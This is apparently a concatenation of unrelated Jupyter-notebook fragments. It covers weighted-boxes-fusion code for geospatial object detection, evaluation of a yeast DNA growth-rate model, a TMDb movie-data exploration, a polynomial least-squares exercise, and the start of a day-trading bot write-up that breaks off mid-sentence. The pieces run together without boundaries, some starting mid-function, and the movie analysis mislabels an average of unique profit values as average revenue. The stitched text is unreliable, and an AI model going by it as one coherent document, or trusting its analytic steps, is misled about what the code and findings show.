(new_box[2] - new_box[0]) * (new_box[3] - new_box[1]) iou = interArea / (boxAArea + boxBArea - interArea) return iou if boxes_list.shape[0] == 0: return -1, match_iou # boxes = np.array(boxes_list) boxes = boxes_list ious = bb_iou_array(boxes[:, 4:], new_box[4:]) ious[boxes[:, 0] != new_box[0]] = -1 best_idx = np.argmax(ious) best_iou = ious[best_idx] if best_iou <= match_iou: best_iou = match_iou best_idx = -1 return best_idx, best_iou def weighted_boxes_fusion(boxes_list, scores_list, labels_list, weights=None, iou_thr=0.55, skip_box_thr=0.0, conf_type='avg', allows_overflow=False): ''' :param boxes_list: list of boxes predictions from each model, each box is 4 numbers. It has 3 dimensions (models_number, model_preds, 4) Order of boxes: x1, y1, x2, y2. We expect float normalized coordinates [0; 1] :param scores_list: list of scores for each model :param labels_list: list of labels for each model :param weights: list of weights for each model. Default: None, which means weight == 1 for each model :param iou_thr: IoU value for boxes to be a match :param skip_box_thr: exclude boxes with score lower than this variable :param conf_type: how to calculate confidence in weighted boxes. 'avg': average value, 'max': maximum value, 'box_and_model_avg': box and model wise hybrid weighted average, 'absent_model_aware_avg': weighted average that takes into account the absent model. 
:param allows_overflow: false if we want confidence score not exceed 1.0 :return: boxes: boxes coordinates (Order of boxes: x1, y1, x2, y2). :return: scores: confidence scores :return: labels: boxes labels :return: originals: original boxes ''' if weights is None: weights = np.ones(len(boxes_list)) if len(weights) != len(boxes_list): print('Warning: incorrect number of weights {}. Must be: {}. Set weights equal to 1.'.format(len(weights), len(boxes_list))) weights = np.ones(len(boxes_list)) weights = np.array(weights) if conf_type not in ['avg', 'max', 'box_and_model_avg', 'absent_model_aware_avg']: print('Unknown conf_type: {}. Must be "avg", "max" or "box_and_model_avg", or "absent_model_aware_avg"'.format(conf_type)) exit() filtered_boxes = prefilter_boxes(boxes_list, scores_list, labels_list, weights, skip_box_thr) if len(filtered_boxes) == 0: return np.zeros((0, 4)), np.zeros((0,)), np.zeros((0,)) overall_boxes = [] original_boxes = [] for label in filtered_boxes: boxes = filtered_boxes[label] new_boxes = [] weighted_boxes = np.empty((0,8)) # Clusterize boxes for j in range(0, len(boxes)): index, best_iou = find_matching_box_quickly(weighted_boxes, boxes[j], iou_thr) if index != -1: new_boxes[index].append(boxes[j]) weighted_boxes[index] = get_weighted_box(new_boxes[index], conf_type) else: new_boxes.append([boxes[j].copy()]) weighted_boxes = np.vstack((weighted_boxes, boxes[j].copy())) original_boxes.append(new_boxes) # Rescale confidence based on number of models and boxes for i in range(len(new_boxes)): clustered_boxes = np.array(new_boxes[i]) if conf_type == 'box_and_model_avg': # weighted average for boxes weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / weighted_boxes[i, 2] # identify unique model index by model index column _, idx = np.unique(clustered_boxes[:, 3], return_index=True) # rescale by unique model weights weighted_boxes[i, 1] = weighted_boxes[i, 1] * clustered_boxes[idx, 2].sum() / weights.sum() elif conf_type == 'absent_model_aware_avg': # get unique model index in the cluster models = np.unique(clustered_boxes[:, 3]).astype(int) # create a mask to get unused model weights mask = np.ones(len(weights), dtype=bool) mask[models] = False # absent model aware weighted average weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / (weighted_boxes[i, 2] + weights[mask].sum()) elif conf_type == 'max': weighted_boxes[i, 1] = weighted_boxes[i, 1] / weights.max() elif not allows_overflow: weighted_boxes[i, 1] = weighted_boxes[i, 1] * min(len(weights), len(clustered_boxes)) / weights.sum() else: weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / weights.sum() overall_boxes.append(weighted_boxes) original_boxes = [item for sublist in original_boxes for item in sublist] overall_boxes = np.concatenate(overall_boxes, axis=0) sidx = overall_boxes[:, 1].argsort() overall_boxes = overall_boxes[sidx[::-1]] boxes = overall_boxes[:, 4:] scores = overall_boxes[:, 1] labels = overall_boxes[:, 0] # sort originals accoring to wbf #original_boxes = original_boxes[0] wbfo = [original_boxes[i] for i in sidx[::-1]] return boxes, scores, labels, wbfo # export def do_wbf(gdf:gpd.GeoDataFrame, iou_thr=0.55, skip_box_thr=0.5): """Run weighted_boxes_fusion and returns a gpd.GeoDataFrame where geometries are replaced by new bounding boxes. 
Do not use with instance segmentation data unless you want to replace your results with bounding boxes """ np_bboxes = [b.bounds for b in gdf.geometry] np_bboxes = normalize_bbox_coords(gdf.total_bounds, np_bboxes) np_bboxes = [[b for b in np_bboxes]] scores = [[v for v in gdf.score.values]] labels = [[l for l in gdf.label.values]] wbf_boxes, wbf_scores, wbf_labels, _ = weighted_boxes_fusion(np_bboxes, scores, labels, iou_thr=iou_thr, skip_box_thr=skip_box_thr) wbf_gdf = gpd.GeoDataFrame() wbf_gdf['label'] = wbf_labels wbf_gdf['score'] = wbf_scores wbf_boxes = denormalize_bbox_coords(gdf.total_bounds, wbf_boxes) wbf_gdf['geometry'] = [box(*bbox) for bbox in wbf_boxes] wbf_gdf.crs = gdf.crs return wbf_gdf # export def do_wsf(gdf:gpd.GeoDataFrame, iou_thr=0.55, skip_box_thr=0.5): np_bboxes = [b.bounds for b in gdf.geometry] np_bboxes = normalize_bbox_coords(gdf.total_bounds, np_bboxes) np_bboxes = [[b for b in np_bboxes]] scores = [[v for v in gdf.score.values]] labels = [[l for l in gdf.label.values]] wbf_boxes, wbf_scores, wbf_labels, originals = weighted_boxes_fusion(np_bboxes, scores, labels, iou_thr=iou_thr, skip_box_thr=skip_box_thr) wbf_gdf = gpd.GeoDataFrame() wbf_gdf['label'] = wbf_labels wbf_gdf['score'] = wbf_scores wbf_boxes = denormalize_bbox_coords(gdf.total_bounds, wbf_boxes) wbf_gdf['geometry'] = [box(*bbox) for bbox in wbf_boxes] wbf_gdf.crs = gdf.crs wbf_scores = [] wbf_labels = [] wbf_masks = [] for i, wbox in tqdm(enumerate(wbf_gdf.itertuples())): wbf_scores.append(wbox.score) wbf_labels.append(wbox.label) orig_bboxes = [bbox[4:] for bbox in originals[i]] orig_bboxes = denormalize_bbox_coords(gdf.total_bounds, orig_bboxes) orig_bboxes = [box(*bounds) for bounds in orig_bboxes] orig_masks = [m for m in gdf.geometry if box(*m.bounds) in orig_bboxes] mask = shapely.ops.unary_union(orig_masks) mask = mask.intersection(wbox.geometry) wbf_masks.append(mask) mask_gdf = gpd.GeoDataFrame() mask_gdf['label'] = wbf_labels mask_gdf['score'] = wbf_scores mask_gdf['geometry'] = wbf_masks mask_gdf.crs = gdf.crs return mask_gdfSmoothing and filling holes Below functions are run before converting IceVision preds to COCO or shapefile format.# export def fill_holes(preds:list) -> list: "Run `binary_fill_holes` to predicted binary masks" for i, p in tqdm(enumerate(preds)): for j in rangeof(p.pred.detection.label_ids): p_mask = p.pred.detection.mask_array.to_mask(p.height, p.width).data[j] p.pred.detection.mask_array.data[j] = binary_fill_holes(p_mask).astype(np.int8) return preds def dilate_erode(preds:list) -> list: "Run dilation followed by erosion in order to smooth masks" for i, p in tqdm(enumerate(preds)): for j in rangeof(p.pred.detection.label_ids): p_mask = p.pred.detection.mask_array.to_mask(p.height, p.width).data[j] p.pred.detection.mask_array.data[j] = erosion(dilation(p_mask)) return predsA script that detects errors in a `gcode` file would be helpful.def check(path): passEvaluate yeast DNA regression model on test setHere we evaluate the model we trained using the training set (90%) while monitoring performance on the validation set (5%). For evaluation, we use the held-out test set (5%) which was never imported into the Peltarion platform. 
The training/validation/test split is (as far as we know) the same as in the [Deep learning of the regulatory grammar of yeast 5′ untranslated regions from 500,000 random sequences](https://genome.cshlp.org/content/27/12/2015) paper, so we can directly compare with the figures in that paper.import numpy as np import pandas as pd import seaborn as sb from sklearn.metrics import explained_variance_score import sidekickAs part of the data preparation, we exported Numpy arrays with training, validation and test input features (one-hot encoded DNA sequences) and labels. Now we load the test sequences and labels that were prepared then, and check that the shapes of the data look right.X_test = np.load('yeast_seq_test.npy') y_test = np.load('yeast_labels_test.npy') print(X_test.shape) print(y_test.shape)(24468, 4, 70, 1) (24468, 1)Indeed, there are ~25,000 test examples, corresponding to 5% of the total of almost 500,000 sequences. The shape of the sequence data is (4, 70, 1), corresponding to 4 values for one-hot encoding the nucleotides A, C, G, T, 70 values for the 50 nucleotides with a padding of 10 on each side, and one dummy dimension that enables us to use 2D Convolution layers for processing these data. (The paper does it in the same way.)The label has a single value, namely the growth rate, which is just a floating-point number.Now we can make a Sidekick Deployment object:client = sidekick.Deployment( url='', token='' )First check that this object works for predicting a single example before we move on to predicting all of them.client.predict(seq=X_test[0])It works, so now we can move on to getting predictions for all of the test examples.test_preds = client.predict_many([{'seq': x} for x in X_test])The `predict_many()` method will return a list of dictionaries containing predictions which looks something like this:```[{'growth_rate': array([0.72314715], dtype=float32)}, {'growth_rate': array([-1.3992405], dtype=float32)}, {'growth_rate': array([-1.3097613], dtype=float32)}, [...]]``` So we need to extract the numerical predictions from each of these dictionaries by accessing the key `growth_rate`:y_pred = [x['growth_rate'][0] for x in test_preds] y_pred[:10]Now we have a normal list of floating point numbers, so we can make a plot like the one in figure 2A of the paper.df = pd.DataFrame({'predicted': y_pred, 'actual': y_test.squeeze()})Scatter plotg = sb.jointplot(x="predicted", y="actual", data=df); g.fig.suptitle("R2={:.2}".format(explained_variance_score(y_test, y_pred)));/anaconda3/lib/python3.6/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result. return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumvalWith point densityThe plot above already gives something that looks like figure 2A in the paper. As we have a large number of data points (almost 25,000), it may also be helpful to see where most of the points are actually located.g = sb.jointplot(x="predicted", y="actual", data=df, kind="kde"); g.fig.suptitle("R2={:.2}".format(explained_variance_score(y_test, y_pred)));/anaconda3/lib/python3.6/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. 
In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result. return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumvalProject: TMDb Movies Data Analysis Table of ContentsIntroductionData WranglingExploratory Data AnalysisConclusions Introduction In this project, I am going to analyze the TMDb Movie Dataset. The dataset, originally from kaggle, was cleaned and provided by Udacity as part of the Data Analsis Nanodegree Program. It's a collection of more than 5000 movies which includes plentiful data on the release year, genres, cast, directors, runtimes, budgets, revenues and production companies. The dataset covers movies with release dates from 1960 to 2015. First I am going to import necessary Python packages that are required to do the analysis. The packages imported are Pandas, Numpy, Matplotlib and Seaborn. Then I will gather, assess and clean the data (data wrangling). Next step is the Exploratory Data Analysis (EDA) to find patterns in the data and build intuition. Next, I will draw conclusions (in the summary section) with descriptive statistics. In the final step, I will communicate the results and justify my findings about the dataset with code results and visualizations. It is worth noting that these steps are how I worked on this project and you will see an intertwined combinations of several of these steps all through my data analysis process. In this project, I am going to find an answer to the following questions: 1 - Which movie genres are most popular from year to year? 2 - What are the 10 most popular movies between 1960 and 2015? 3 - What are the properties associated with high revenue movies? 4 - How have the anuual profitability of the movies changed over time? and what is the most contributing factor to the annual profittability? 5 - What is the average money made by each movie? 6 - Have the movies become shorter or longet over the years? The packages imported are Pandas, Numpy, Matplotlib and Seaborn. I also used the matplot inline to have my visulaizations plotted.import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns %matplotlib inlineData Wrangling General Propertiesdf_movies = pd.read_csv('tmdb-movies.csv') df_movies.head() df_movies.shapeThere are 10866 rows and 21 columns in our dataset. Since there are 21 columns in the dataset, let's take a look at the column headers to check for capitalization, long headers, typos, spaces, misspellings, etc. Looking at the column headers, it looks like the headers do not need any cleaning.df_movies.columns df_movies.describe()From the summary statistics, it's notable that I'm analyzing the movies that were released in the years 1960 to 2015, however, it looks like we don't have many movies that were released between 1960 to 1995 so the majority of the movies analyzed here ( 75%) were released after 1995. Also, there is zero budget or revenue reported for at least half of the movies. I am guessing that these movies might be independent films shot with little to no funding from a major film studio or a private investor. Another possibility could be that these movies were shot by a first time filmmaker or producer with very little to no experience. 
For more information on no budget films, please refer to the link below:**https://en.wikipedia.org/wiki/No-budget_film** Data Cleaningdf_movies.info() RangeIndex: 10866 entries, 0 to 10865 Data columns (total 21 columns): id 10866 non-null int64 imdb_id 10856 non-null object popularity 10866 non-null float64 budget 10866 non-null int64 revenue 10866 non-null int64 original_title 10866 non-null object cast 10790 non-null object homepage 2936 non-null object director 10822 non-null object tagline 8042 non-null object keywords 9373 non-null object overview 10862 non-null object runtime 10866 non-null int64 genres 10843 non-null object production_companies 9836 non-null object release_date 10866 non-null object vote_count 10866 non-null int64 vote_average 10866 non-null float64 release_year 10866 non-null int64 budget_adj 1[...]Now we want to see which features have *missing values*? Based on the data below, it looks like the missing values are random and there is no correlation among missing data. Moreover, the crucial headers containing information needed for data analysis (like revenue_adj, budget_adj, release_date, vote count and title) are not missing any values.df_movies.isnull().sum()According to the website [Imputation (statistics)] https://en.wikipedia.org/wiki/Imputation_(statistics), since the data are missing at random, then listwise deletion does not add any bias. I imputed the data by deleting the rows containg _missing values_:df_movies.dropna(inplace=True)We'll check again to make sure all null data are deleted. It should return False.df_movies.isnull().sum().any()Next, we check how many *duplicate rows* are in the movie dataset?sum(df_movies.duplicated())We can see that there's only 1 duplciate row in the dataset and we will drop that row, as shown below:df_movies.drop_duplicates(inplace = True)We check again for the duplicates to make sure we have dropped the duplicate:sum(df_movies.duplicated())It is time to check the data types and whether there are any problems with them.df_movies.dtypesNotice that the *release_date* are stored as strings (represented by object). We need to convert the *release_date* type datetime format. We can drop some columns that do not affect our data analysis to make our data look better and easier to handle. I decided to drop the following columns from the dataframe: 'imdb_id', 'keywords', 'overview', 'budget', 'revenue', 'homepage', 'tagline', 'release_date'df_movies.drop(['imdb_id', 'keywords','overview','keywords','overview','budget', 'revenue', 'homepage', 'tagline', 'release_date'], axis = 1, inplace = True) # Let's take a look at the data again to make sure there are no missing values nor there are incorrect data types. df_movies.info() Int64Index: 1992 entries, 0 to 10819 Data columns (total 13 columns): id 1992 non-null int64 popularity 1992 non-null float64 original_title 1992 non-null object cast 1992 non-null object director 1992 non-null object runtime 1992 non-null int64 genres 1992 non-null object production_companies 1992 non-null object vote_count 1992 non-null int64 vote_average 1992 non-null float64 release_year 1992 non-null int64 budget_adj 1992 non-null float64 revenue_adj 1992 non-null float64 dtypes: float64(4), int64(4), object(5) memory usage: 217.9+ KBOne more issue is that the genres and cast columns data are separated by pipe (|) characters. 
I will separate the genres data by | and put each unique genre into a new row.clean_movies = (df_movies.set_index(df_movies.columns.drop('genres',1).tolist()) .genres.str.split('|', expand=True) .stack() .reset_index() .rename(columns={0:'genres'}) .loc[:, df_movies.columns] ) clean_movies.head()in the IMDb version it was necessary to treat values of zero in the budget field as missing Exploratory Data Analysis> **Tip**: Now that you've trimmed and cleaned your data, you're ready to move on to exploration. Compute statistics and create visualizations with the goal of addressing the research questions that you posed in the Introduction section. It is recommended that you be systematic with your approach. Look at one variable at a time, and then follow it up by looking at relationships between variables.# I'm going to look at the plots of all the variables to get an overview of how they're correlated and their dependencies. pd.plotting.scatter_matrix(clean_movies, figsize = (16,16));C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:308: MatplotlibDeprecationWarning: The rowNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().rowspan.start instead. layout[ax.rowNum, ax.colNum] = ax.get_visible() C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:308: MatplotlibDeprecationWarning: The colNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().colspan.start instead. layout[ax.rowNum, ax.colNum] = ax.get_visible() C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:314: MatplotlibDeprecationWarning: The rowNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().rowspan.start instead. if not layout[ax.rowNum + 1, ax.colNum]: C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:314: MatplotlibDeprec[...]From the scatter matrix, it can be seen that there are several independant variables and several dependant variables. The independant variables are *runtime, budget_adj* and *id*. The dependant variables are *revenue_adj*.clean_movies.hist(figsize=(10,10));We can observe from the histograms of our data set, that the budget_adj, popularity, vote_count and runtime are all skewed to the right. Whereas release year and average vote are skewed to the left. These observatiosn indicate that only a small fraction of movies have high popularity, high budget and produce high revenues. It also shows that most of the movies in this dataset, were released after year 2000.#### Let's have a look at the budget histogram in more detail clean_movies['budget_adj'].hist() # We can see that the majority of movies have zero or low bugets, let's dig deeper into this. 
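# sketch: what fraction of films report a zero adjusted budget?
(clean_movies['budget_adj'] == 0).mean()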
clean_movies['budget_adj'].describe()Research Question 1: Which movie genres are most popular from year to year?clean_movies['popularity'].describe() genres_popularity = clean_movies.groupby(['release_year','genres']).agg({'popularity': ['mean']}, inplace=True) genres_popularity.tail(25) genres_popularity = genres_popularity.reset_index() genres_popularity.head() genres_popularity.columns = genres_popularity.columns.get_level_values(0) genres_popularity.head() genres_popularity.describe() most_pop_genres = genres_popularity.query('popularity > 1.9') most_pop_genres.sort_values(['release_year', 'popularity'], ascending = False, inplace = True) most_pop_genres.head(20)C:\Users\zariped\Anaconda3\lib\site-packages\ipykernel_launcher.py:2: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copyAs seen in the table above, the popularity have changed a bit over the years for different genres, however, certain genres like *Action*, *Adventure* and *Science Fiction* have stayed quite popular all through the years. Another interesting observation is that the popularity of the movies have substantially increased over the final two years of data. We can investigate this further by evaluating the measure of popularity and the causes for this observation.pop_genres_2015 = most_pop_genres.query('release_year == 2015') pop_genres_2014 = most_pop_genres.query('release_year == 2014') pop_genres_2013 = most_pop_genres.query('release_year == 2013') fig, ax = plt.subplots(3, figsize = (14, 18), sharex = True) ax[0].barh(pop_genres_2013['genres'], pop_genres_2013['popularity'], color = 'b') ax[0].legend(['2013'], fontsize = 14) ax[1].barh(pop_genres_2014['genres'], pop_genres_2014['popularity'], color = 'm') ax[1].legend(['2014'], fontsize = 14) ax[2].barh(pop_genres_2015['genres'], pop_genres_2015['popularity'], color = 'g') ax[2].legend(['2015'], fontsize = 14) fig.suptitle("Most Popular Genres", fontsize = 18) fig.text(0.5, 0.06, 'Popularity', ha = 'center', fontsize = 18) fig.text(0.01, 0.5,'Genres', va = 'center', rotation = 'vertical', fontsize = 18) plt.subplots_adjust(wspace = 0.025, hspace = 0.025) plt.show()Looking at the plots above, confirms our findings about the genres popularity YoY. Research Question 2: What are the 10 most popular movies between 1960 and 2015?# Let's see what's the popularity for the most famous 2% of movies? clean_movies['popularity'].quantile(.98) most_popular = clean_movies.query('popularity > 6.887') most_popular_movies = most_popular.groupby(['original_title', 'popularity']).mean() most_popular_movies.sort_values('popularity', ascending=False).head(10)The 10 most popular movies between 1960 and 2015 are: *'Jurassic World', 'Mad Max: Fury Road', 'Interstellar', 'Guardians of the Galaxy', 'Insurgent', 'Captain America: The Winter Soldier', 'Star Wars', '', 'Star Wars: The Force Awakens' and 'The Hunger Games: Mockingjay - Part 1'*. Research Question 3: What kinds of properties are associated with movies that have high revenues?# Let's investigate the adjusted revenue column first: clean_movies['revenue_adj'].describe() # We will devide the revenue_adj column into categories. 
Bin edges that will be used to cut the data into groups are: bin_edges = [0, 3.56e+07, 1.74e+08, 2.83e+09] # Labels for the three revenue level groups bin_names = ['low', 'medium', 'high'] clean_movies['revenue_adj_levels'] = pd.cut(clean_movies['revenue_adj'], bin_edges, labels = bin_names) clean_movies.head() high_revenue_df = clean_movies.query('revenue_adj_levels == "high"') high_revenue_df.head() high_revenue_df.plot(x='budget_adj', y='revenue_adj', kind='scatter', figsize=(10,10)); plt.xlabel("Budget\n(2010 Dollars)", fontsize=14, labelpad=15) plt.ylabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.title('Revenue vs Budget in High Revenue Films\n(2010 Dollars)', fontsize=16, y=1.04) plt.tick_params(labelsize=12) high_revenue_df.plot(x='vote_count', y='revenue_adj', kind='scatter', figsize=(10,10)) plt.xlabel("Vote Count", fontsize=14, labelpad=15) plt.ylabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.title('Revenue vs Vote_count in High Revenue Films', fontsize=16, y=1.04) plt.tick_params(labelsize=12); high_revenue_df.plot(x='revenue_adj', y='popularity', kind='scatter', figsize=(10,10)); plt.title('Popularity vs Revenue in High Revenue Films', fontsize=16, y=1.04) plt.xlabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.ylabel("Popularity", fontsize=14, labelpad=15) plt.tick_params(labelsize=12) According to the 3 scatter plots above, we can see that there is a strong positive correlation between popularity, budget, vote count and high revenue, which is what we expect in movie production. In a nutshell, for a movie to generate high revenues, production companies need to allocate a larger budget and spend more money on advertisement in order to increase the vote count and enhance the revenue stream. However, we can also see some outliers in all three plots. For example, the "Popularity vs Revenue in High Revenue Films" scatter plot indicates that some very high revenue films are not actually that popular. Also, several low budget movies have produced very high revenues. These outliers need to be investigated further on a case by case basis to identify other contributing factors to the observed outcomes. Research Question 4: How has the annual profitability of movies changed over time? # Let's calculate the adjusted profit (in 2010 dollars) for our dataset. clean_movies.insert(14,'profit_adj', clean_movies['revenue_adj']-clean_movies['budget_adj']) clean_movies.head(2) annual_profits_total = clean_movies.groupby('release_year')['profit_adj'].sum() plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Profits earned by Movies\n(2010 Dollars)', fontsize = 10) #title of the line plot plt.title('Annual Profits of Movies vs Release Year\n(2010 Dollars)') #plotting the graph plt.plot(annual_profits_total) #displaying the line plot plt.show() The plot shows that the annual profits from movies were roughly flat from the 1960s to the year 2000. Starting in 2000, we can see an exponential increase in the profitability of the movies.
Let's investigate whether the budget can be a contributing factor in this uptrend.annual_budget_total = clean_movies.groupby('release_year')['budget_adj'].sum() plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Total Budget Spent on Movies \n(2010 Dollars)', fontsize = 10) #title of the line plot plt.title('Total Annual Budgets of Movies vs Release Year\n(2010 Dollars) ') #plotting the graph plt.plot(annual_budget_total) #displaying the line plot plt.show()We can see that the budget spent on the movies follows the same trend as the annual profits. Research Question 5: What is the average money made by each movie?average_revenue = clean_movies['profit_adj'].unique().mean() average_revenueThe average revenue for each movie is 118.1 Million Dollars. Research Question 6: Have the movies become shorter or longer over the years?clean_movies['runtime'].describe() # Looks like more than half of the movies have a duration between 90-120 minutes. Now let's look at the yearly fluctuations in movie duration. anual_average_movie_runtime = clean_movies.groupby('release_year')['runtime'].mean() anual_average_movie_runtime.tail(10) # Now we can take a look at the diagram of runtimes over the years to see if there's a pattern. plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Length\n(Minutes)', fontsize = 10) #title of the line plot plt.title('Average Film Length, 1960-2015') #plotting the graph plt.plot(anual_average_movie_runtime, color = 'b') #displaying the line plot plt.show()Fit a Polynomialimport pandas as pd import matplotlib.pyplot as plt import numpy as np url = 'https://raw.githubusercontent.com/BolunDai0216/nyuMLSummerSchool/master/day03/polyfit_data.csv' df = pd.read_csv(url) x = df['x'].values y = df['y'].values plt.plot(x,y,'o') plt.xlabel('x') plt.ylabel('y') plt.show()Exercice :1) Compute the Design matrix :$ \begin{bmatrix} 1 & x_{1} & x_{1}^2 & \cdots & x_{1}^M \\ 1 & x_{2} & x_{2}^2 & \cdots & x_{2}^M \\ \vdots & & \ddots & & \vdots \\ 1 & x_{N} & x_{N}^2 & \cdots & x_{N}^M \end{bmatrix}$2) Compute the Least-Square solution : $\mathbf{w} = (X^TX)^{-1}X^TY$3) Compute the MSE4) Make a prediction for xplt = np.linspace(0, 5, 100) and plot your polynomial over the data points5) Try to find the "best" value for M# Choose any integer value for M M = 3 def design_matrix(x, M): x = x.reshape(-1,1) bias_col = np.ones((x.shape[0], 1)) PhiX = bias_col for i in np.arange(1, M+1): PhiX = np.hstack([PhiX, x**i]) return PhiX X = design_matrix(x, M) y = y.reshape(-1, 1) # w = np.linalg.inv(X.T @ X) @ X.T @ y w = np.linalg.pinv(X) @ y yhat = X @ w mse = np.mean((y-yhat)**2) print('Polynomial degree = {} '.format(M), 'mse = {}'.format(mse)) xplt = np.linspace(0, 5, 100) Xplt = design_matrix(xplt, M) yplt = Xplt @ w plt.plot(xplt, yplt,'b') plt.plot(x,y,'o')Polynomial degree = 3 mse = 0.0317958519811255Bonus :Reproduce your code with sklearn !from sklearn import linear_model X = design_matrix(x, M) # fitting the model reg = linear_model.LinearRegression(fit_intercept=False) reg.fit(X, y) w = reg.coef_ # training error yhat = reg.predict(X) mse = np.mean((y-yhat)**2) print('Polynomial degree = {} '.format(M), 'mse = {}'.format(mse)) yplt = reg.predict(design_matrix(xplt, M)) plt.plot(xplt, yplt,'b') plt.plot(x, y,'o')Polynomial degree = 3 mse = 0.031795851981125056Searching for the best Mdegrees = [1, 3, 5, 12, 20] fig, ax = plt.subplots(5, 1, figsize=(8,15)) xplt = np.linspace(x.min(), 
x.max(), 1000) for i in range(5): M = degrees[i] X = design_matrix(x, M) reg = linear_model.LinearRegression(fit_intercept=False) yhat = reg.fit(X, y) yhat = reg.predict(X) mse = np.mean((y-yhat)**2) yplt = reg.predict(design_matrix(xplt, M)) ax[i].plot(xplt, yplt,'b') ax[i].plot(x, y,'o') ax[i].set_title(f'Degree = {M} mse = {mse}') plt.tight_layout()Train/Testx = df['x'].values y = df['y'].values nsamp = x.shape[0] print(f'We have {nsamp} samples') inds = np.random.permutation(nsamp) ntrain = 12 ntest = 8 train_index = inds[:ntrain] test_index = inds[ntrain:] xtrain, ytrain = x[train_index], y[train_index] xtest, ytest = x[test_index], y[test_index] print(xtrain.shape) print(ytrain.shape) print(xtest.shape) print(ytest.shape) M = 10 Xtrain = design_matrix(xtrain, M) # fitting the model reg = linear_model.LinearRegression(fit_intercept=False) reg.fit(Xtrain, ytrain) yplt = reg.predict(design_matrix(xplt, M)) plt.plot(xplt, yplt,'b') plt.plot(xtrain,ytrain,'o',markeredgecolor='black') plt.plot(xtest,ytest,'o',markeredgecolor='black')1.0 Project Goal This project implements 2 of the 6 stock trading algorithm dicussed in the [Become a Day Trader Course by Investopedia](https://academy.investopedia.com/products/become-a-day-trader)The project consists of two parts: - First a python file that simulates trading Apple's stock during March 10, 2020 to April 3, 2020 using the trading algorithms from Investopedia's course- Second is this Jupyter Notebook that describes the methodology behind the trading bot, result of trading from previous step and future improvement 2.0 Project InspirationThis project was inspired by the stock market crash of March 2020 and intended to be used as a comprehensive system to trade stocks and make money.The bulls or people confident in the market lost a lot of money in March 2020 crash. However, the bears or the people betting against the market made a fortune. Within a few weeks, the market started its uptrend again and reached an all-time high within few months from nearly 50% down. The rapid decline and rise in the market provided a tremendous opportunity for profit and served as a very inspirational moment. Instead of making money only once, depending on whether I was a bull or bear, I wanted to make money all the time. Trading stocks is a losing game for most people: 90% of traders lose money, and only 10% make money consistently. From my research and experience in the stock market, some of the best predictors for success in trading are managing emotions, processing information quickly to see patterns before others, and executing fast. Thus, I embarked on a journey to create a trading bot that would be able to do all of this better than I ever could. This project looks at a relatively simple trading bot that will serve as the building block of a comprehensive trading system. This bot uses two out of 6 algorithms from Investopedia's day trading course. The other four algorithms were not precise, and I wanted a working bot released as quickly as possible for testing and optimization purposes. The bot trades Apple's stock only and also operates under an ideal condition, which simplified the buying and selling process of stocks. With all that said, let's see how the trading bot does with an initial balance of USD 10,000 3.0 Background into Stock Market and Day Trading 3.1 Investing vs. Day Trading and Short vs. 
Long PositionWhen buying a particular stock, knowledgable investors typically use a combination of the company's fundamentals, stock's price chart, and related news to determine whether to go long on a stock or short it.When an investor is confident that stock's price will increase, he buys the stock and profits when the stock's price rises. In trading terminologies, this is going on long on a stock. On the other hand, if an investor expects a stock's price to go down, he would short the stock. Shorting a stock means that he loans shares and sells it in the open market with the hope that he can buy and return the shares back to the owner at a lower price. There are other securities that traders can trade which are out of scope for this project.A trader typically holds a stock for a much shorter period than an investor. A day trader would close off his positions at the end of the business day. The rationale behind this is to help him mentally check out and start fresh the following day. Also, a day trader only looks at the stock's price chart to make trading decisions. This trading bot day trades. So all of the positions are closed at the end of the day, and only the stock's price chart is used to make trading decisions. 3.2 Different Type of OrdersFor simplification, the different types of orders when buying stocks using a broker will be explained from the perspective of an investor intending to go long on a stock.When buying shares, the buyer can specify a market order or limit order. A market order will instruct the broker's bot to purchase shares at the best current price; this price is usually very close or the same as the current stock's price shown by the broker. For a limit order, the buyer specifies what price he wishes to buy a specific number of shares; this price is called the limit price and is usually lower than the current stock's price.When selling shares, the buyer can specify a market order, limit order, or stop-loss order. Just like with buying shares, a market order will instruct the broker's bot to sell the specified number of shares asap at the best possible price. For a limit order, the buyer specifies what price he wishes to sell a specific number of shares; this price is called the limit price, and this price is typically equal to or above the stock's current price. For a stop-loss order, the seller specifies the stop-loss price which if the stock price hits, the bots are to sell a specified number of shares automatically at the limit price or higher; the limit price and stop-loss price could be the same; both are usually below the current stock price.For shorting a stock, buying would imply loaning shares and selling on the market, and selling would mean buying shares back from the open market to return to the owner. All the trade algorithms here utilizes market order when buying. For every purchase order, two other orders are specified for selling the position. The first order for selling is a limit sell order, and the second order is a stop-loss order. A profitable trade would be closed by a limit sell, and unprofitable trade would be closed by a stop-loss sell. For going long on a stock, the limit price for selling would be set higher than the 